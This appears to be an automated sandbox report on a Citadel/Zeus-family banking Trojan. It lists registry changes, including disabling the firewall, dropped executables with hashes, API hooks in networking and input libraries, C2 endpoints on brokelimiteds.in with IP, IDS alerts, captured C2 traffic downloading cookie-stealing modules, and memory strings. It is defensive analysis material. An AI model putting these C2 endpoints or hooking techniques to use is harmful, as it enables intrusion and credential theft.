The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 F1 AD 96 DF 13 EE DB BD E1 E4 B1 86 D7 A1 C5"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process netsh.exe:3540 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED 2A 31 57 F8 C7 01 AF 21 A5 8F C6 DD 58 50 0F"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

Dropped PE files

MD5 File path
24b4781cbaa2591b06facbfb2b73599b c:\Documents and Settings\All Users\Application Data\wipeshadow.exe
2958d7758a7775e326769db66acfac8d c:\Documents and Settings\"%CurrentUserName%"\Application Data\Imxyhi\ibza.exe
2d77278e00ecaba9fabcf11ad1720012 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Pony.exe
24b4781cbaa2591b06facbfb2b73599b c:\Documents and Settings\"%CurrentUserName%"\Application Data\cry.exe
338ed636747a1cc689df89959ab7b4ad c:\Documents and Settings\"%CurrentUserName%"\Application Data\crys.exe
0877a88f8d8a43e3fe07b4126fac9c6a c:\Documents and Settings\"%CurrentUserName%"\Application Data\soft.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in WINMM.dll:

PlaySoundW

The Trojan installs the following user-mode hooks in WININET.dll:

HttpEndRequestW
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetSetFilePointer
InternetQueryDataAvailable
HttpOpenRequestW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
HttpOpenRequestA

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in USER32.dll:

SetCursorPos
DefMDIChildProcA
DefFrameProcA
DefDlgProcA
GetClipboardData
DefMDIChildProcW
DefFrameProcW
GetUpdateRgn
RegisterClassA
GetDCEx
ReleaseCapture
SetCapture
DefWindowProcA
CallWindowProcA
GetUpdateRect
PeekMessageA
CallWindowProcW
GetMessagePos
GetCursorPos
EndPaint
BeginPaint
DefWindowProcW
RegisterClassExA
GetMessageA
DefDlgProcW
SwitchDesktop
OpenInputDesktop
RegisterClassExW
RegisterClassW
GetCapture
PeekMessageW
GetMessageW
GetWindowDC
TranslateMessage
GetDC
ReleaseDC

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
gethostbyname
send
closesocket
getaddrinfo

The Trojan installs the following user-mode hooks in kernel32.dll:

ExitProcess
GetFileAttributesExW

The Trojan installs the following user-mode hooks in ntdll.dll:

NtCreateThread

Propagation

VersionInfo

No information is available.

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text   8192             1644868       1645056   5.19639   c50f13b6e21b445aefc09a4c9554d72c
.rsrc   1654784          1160          1536      4.0986    7ba591c539db9b226d38dc48c86bffae
.reloc  1662976          12            512       0.070639  b62f0a0d0bae3c8fd91794ccbd71dc50

URLs

URL IP
hxxp://e6845.dscb1.akamaiedge.net/pca3-g5.crl
hxxp://e6845.dscb1.akamaiedge.net/sf.crl
hxxp://brokelimiteds.in/wp-admin/css/php/file.php 142.4.17.213
hxxp://www.google.com/webhp 173.194.113.208
hxxp://www.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA 173.194.113.208
hxxp://www.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ 173.194.113.208
hxxp://brokelimiteds.in/wp-admin/css/php/gate.php 142.4.17.213
hxxp://sf.symcb.com/sf.crl 23.63.133.163
hxxp://crl.verisign.com/pca3-g5.crl 23.63.133.163


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment
ET TROJAN Zeus Bot GET to Google checking Internet connectivity
ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN Generic - POST To .php w/Extended ASCII Characters
ET TROJAN Generic -POST To gate.php w/Extended ASCII Characters

Traffic

GET /webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cache-Control: no-cache
Host: VVV.google.com.ua


HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See hXXps://VVV.google.com/support/accounts/answer/151657?hl=en for more info."
Date: Wed, 03 Aug 2016 14:59:10 GMT
Server: gws
Content-Length: 283
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=83=vhqo0Y-gqfwjrCiTBFHAZr0YjeEOTak2Xdxxa-c7apY_yRw6n9ZCtLXDwa2UcOC3r6ENlJoMb11nYg-GcB-m7VqikiiVpYaANRqmQly6-LEy6U2S2eKp6T3KhwEJOmdK; expires=Thu, 02-Feb-2017 14:59:10 GMT; path=/; domain=.google.com.ua; HttpOnly
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA&gws_rd=ssl">here</A>...</BODY></HTML>....


POST /wp-admin/css/php/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: brokelimiteds.in
Content-Length: 369
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 14:58:36 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.23
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


POST /wp-admin/css/php/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: brokelimiteds.in
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 14:58:08 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.23
Cache-Control: public
Content-Disposition: attachment; filename="./files/config.dll"
Content-Transfer-Encoding: binary
Content-Length: 5344
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

<<< skipped >>>

GET /webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cookie: NID=83=vhqo0Y-gqfwjrCiTBFHAZr0YjeEOTak2Xdxxa-c7apY_yRw6n9ZCtLXDwa2UcOC3r6ENlJoMb11nYg-GcB-m7VqikiiVpYaANRqmQly6-LEy6U2S2eKp6T3KhwEJOmdK
Cache-Control: no-cache
Host: VVV.google.com.ua


HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See hXXps://VVV.google.com/support/accounts/answer/151657?hl=en for more info."
Date: Wed, 03 Aug 2016 14:59:11 GMT
Server: gws
Content-Length: 283
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=83=ihMwwXI0KwesTolDbqjXLnRv4xbNtmsv_TyUTTQEd4MzLmTH6ilv-UlWklmIaKWb4yUoC9Si6ZuNI3hX3zkSOF_vmPfujQWBZvStI35pAHjzoZq7soFNwjCT9HPU42RF; expires=Thu, 02-Feb-2017 14:59:11 GMT; path=/; domain=.google.com.ua; HttpOnly
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ&gws_rd=ssl">here</A>...</BODY></HTML>....


GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA
Content-Length: 267
Date: Wed, 03 Aug 2016 14:59:09 GMT
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA">here</A>...</BODY></HTML>....


GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ
Content-Length: 267
Date: Wed, 03 Aug 2016 14:59:11 GMT
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ">here</A>...</BODY></HTML>....


POST /wp-admin/css/php/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: brokelimiteds.in
Content-Length: 128
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 14:58:08 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.23
Cache-Control: public
Content-Disposition: attachment; filename="./files/cit_video.module"
Content-Transfer-Encoding: binary
Content-Length: 177951
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

<<< skipped >>>

POST /wp-admin/css/php/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: brokelimiteds.in
Content-Length: 131
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 14:58:14 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.23
Cache-Control: public
Content-Disposition: attachment; filename="./files/cit_ffcookie.module"
Content-Transfer-Encoding: binary
Content-Length: 221471
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream

<<< skipped >>>

GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "49ddd5ee9b8941ed8ccf55aec088f07c:1467490816"
Last-Modified: Sat, 02 Jul 2016 20:20:16 GMT
Date: Wed, 03 Aug 2016 14:57:58 GMT
Content-Length: 571
Connection: keep-alive
Content-Type: application/pkix-crl

<<< skipped >>>

GET /sf.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: sf.symcb.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "32fab37b2b373a0a0b19f1374b5f121d:1470215192"
Last-Modified: Wed, 03 Aug 2016 09:06:32 GMT
Date: Wed, 03 Aug 2016 14:57:58 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

cry.exe_372_rwx_00D50000_00006000:

%x#yRh

cry.exe_372_rwx_03720000_0000F000:

{@0 {`0 {01 {@1 {

DW20.EXE_1296:

.text
`.data
.cdata
.rsrc
watson.microsoft.com
.mdmp
%s?szAppName=%S&szAppVer=%S&szAppStamp=%S&szModName=%S&szModVer=%S&szModStamp=%S&fDebug=%S&offset=%S
/dw/stagetwo.asp
%s/%S/%S/%S/%S/%S/%S/%S/%S.htm
Failed to fill report params from generic params
Not offering reporting
%s Mode
Failed to get a reporting destination
Nothing to report from queue
No reports left to send. Removing queue triggers and bailing.
Failed to plug UI; LCID=%u
Ignoring %S due to unknown queue version
Reporting is disabled
SignOff queue reporting is disabled
Queued Reporting Mode called but still want to report to the queue
Bad queue type to report from
No reports for given queue mask - %u
Invalid queue mask - %u
Suspending: Force cancel to queued reporting
Suspending: Force cancel to network reporting
CreateWindowExA failed with %d.
Application Error Reporting %d
WatsonQueuedReportingInstanceVerification
riched20.dll
qMicrosoft\PCHealth\ErrorReporting\DW
msaccess.exe
hXXp://watson.microsoft.com/dw/dcp.asp
hXXp://watson.microsoft.com/dw/watsoninfo.asp
dwintl20.dll
Launching lightweight browser with URL
mshtml.dll
Not reporting
Reporting
DWBypassQueue
DWExplainerURL
DWNoSignOffQueueReporting
DWAlwaysReport
DWReporteeName
DWURLLaunch
DWNoExternalURL
DWStressReport
ole32.dll
imm32.dll
BTLog.dll
Microsoft\PCHealth\ErrorReporting\DW
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
hXXp://
hXXps://
Software\Microsoft\PCHealth\ErrorReporting\DW\Debug
%s\%s
https
DwBTLog.log
Failed to get minidump for %S!
szAppName=%s
szAppVer=%d.%d.%d.%d
szAppStamp=x
szModName=%s
szModVer=%d.%d.%d.%d
szModStamp=x
fDebug=%s
offset=x
microsoft.com
.msn.com
.microsoft.com
d:d:d d-d-d
/dw/generictwo.asp
kernel32.dll
psapi.dll
mso.dll
MsoDWRecover%x
MsoDWHang%x
Launching browser with URL
shell32.dll
%d.%d.%d.%d
%d.%d.%d.%d.x.%d.%d
shfolder.dll
unknown.sig
%s dw20.exe %d.%d.%d.%d
RegKey=
ResponseURL=
URLLaunch=
NoExternalURL=
%s:(%s) XX
%s:(%s) X
%s:(%s)
%s:(%s) %s
registry.txt
wql.txt
Windows NT Version %d.%d Build: %d
Stage 1 server response: %s
Stage 2 server response: %s
Stage 4 server response: %s
StatusCode: %d
Opening server: %s
HttpOpen failed.
Opening %s Request:
HTTPS
HttpSend Failed.
HttpWrite Failed, GLE=%d.
HttpEndReq failed.
Count filename length greater than MAX_PATH, can't report.
Filesystem reporting: count file updated
FReportToQueue: GetLastError=%u
FReportToQueue: File Tree Root does not exist: %S
Failed to add heap file to cab: %S
memory.dmp
mdmpmem.hdmp
version.txt
Network reporting complete.
Network reporting failed.
Application Error Reporting Transfer %d
Filesystem reporting complete
Filesystem reporting: cab successfully written
Filesystem reporting: could not find/create directory for cab/count
Filesystem reporting: redirection failure, too many redirects
Filesystem reporting: redirection failure, no previous roots
Filesystem reporting: improper file tree root
Filesystem reporting cancelled
Filesystem reporting: file tree root is too long
Record: 0xxx
Address: 0xxx
Code: 0xx
Flags: 0xx
x:x
(%d.%d:%d.%d)
Checksum: 0xx
Time Stamp: 0xx
Image Base: 0xx
Image Size: 0xx
Module %d
Windows NT %d.%d Build: %d
CPU AMD Feature Code: X
CPU Version: X CPU Feature Code: X
CPU Vendor Code: X - X - X
0xx:
0xx: x x x x
EFlags: 0xx ESP: 0xx SegSs: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EDI: 0xx ESI: 0xx EAX: 0xx
Thread ID: 0xx
Thread %d
Memory Range %d
Software\Microsoft\PCHealth\ErrorReporting\DW
OkToReportFromTheseQueues
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to obtain queue mutex. GetLastError=%u
FGetQueueMutex: WaitForSingleObject returned %u
Failed to open or create queue mutex. GetLastError=%u
Failed queued reporting pester check
Failed to create run reg key
Persistent run key is set.
CoInitializeEx() returned 0x%x.
Reporting to Admin Queue
Reporting to Regular Queue
Reporting to SignOff Queue
Reporting to Headless Queue
Reporting from Regular Queue
Reporting from SignOff Queue
Reporting from Headless Queue
OOM Failed to alloc QueuedReportData
FAllocSD: GetLastError=%u
%s%s%s
FEnsureQueueDirW: GetLastError=%u
Failed to write snt. GLE: %u
Failed to create snt. GLE: %u
Failed to set info; bad queue type: %u
Failed to open reg key for queue
Failed to get windows folder path for queue: %u
Failed to move instr file from queue A to queue B - %u
Failed to move cab file from queue A to queue B - %u
Did not move any reports from admin q to user q
Did not move any reports from user q to headless q
Queue types that have reports: %u
Setting triggerAtConnectionMade to: %u
Setting triggerAtLogon to: %u
Setting the queue trigger based upon: %u
SUCCESS adding report to queue
Launched (%S)
Failed to store the SensSubscription. hr: %d
failed to allocate PROGID string: %S
Failed putting SubscriberInterface. hr: %d
Failed putting PerUser. hr: %d
Failed putting Enabled. hr: %d
Failed putting MachineName. hr: %d
Failed putting OwnerSID. hr: %d
Failed putting Description. hr: %d
Failed putting InterfaceID. hr: %d
Failed putting EventClassID. hr: %d
Failed putting MethodName. hr: %d
Failed putting SubscriptionName. hr: %d
Failed putting PublisherID. hr: %d
Failed putting SubscriberCLSID. hr: %d
Failed putting SubscriptionID. hr: %d
Failed CoCreateInstance on EventSubscription. hr: %d
Failed to remove the SensSubscription. hr: %d
failed to allocate query string: %S
Failed CoCreateInstance on EventSystem. hr: %d
SENS: StringFromIID() returned <%x>
DWSHARED: SysAllocString(%s) failed!
Failed to subscribe subscription %u. hr: %d
Failed to get data for subscription %u. hr: %d
Failed to query install reg key
Failed to open install reg key
Software\Microsoft\PCHealth\ErrorReporting\DW\Installed
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
initing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
freeing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
0addref CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
QIing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
releasing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
deleting CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
creating CDwAccessible: hwnd %x, idc %d
WriteAtOffset.Write(0x%x) failed, 0xx
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteDirectoryEntry.Write(0x%x) failed, 0xx
Thread(0x%x) callback returned FALSE
WriteSystemInfo.GetOsCsdString failed, 0xx
WriteSystemInfo.GetCpuInfo failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed, retries %d, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
Kernel minidump write failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
Invalid exception record parameter count (0x%x)
Invalid exception record size (0x%x)
Invalid CPU type (0x%x)
Invalid function table size (0x%x)
GetSystemType.GetOsInfo failed, 0xx
GetSystemType.GetCpuType failed, 0xx
Write.Start failed, 0xx
Dump type requires streaming but output provider does not support streaming
Invalid dump type 0x%x
dbghelp.dll
Alloc(0x%x) failed
Thread(0x%x) will not be included
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
0GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
0GenGetAuxMemory(%ws) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.Start(0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
version.dll
ntdll.dll
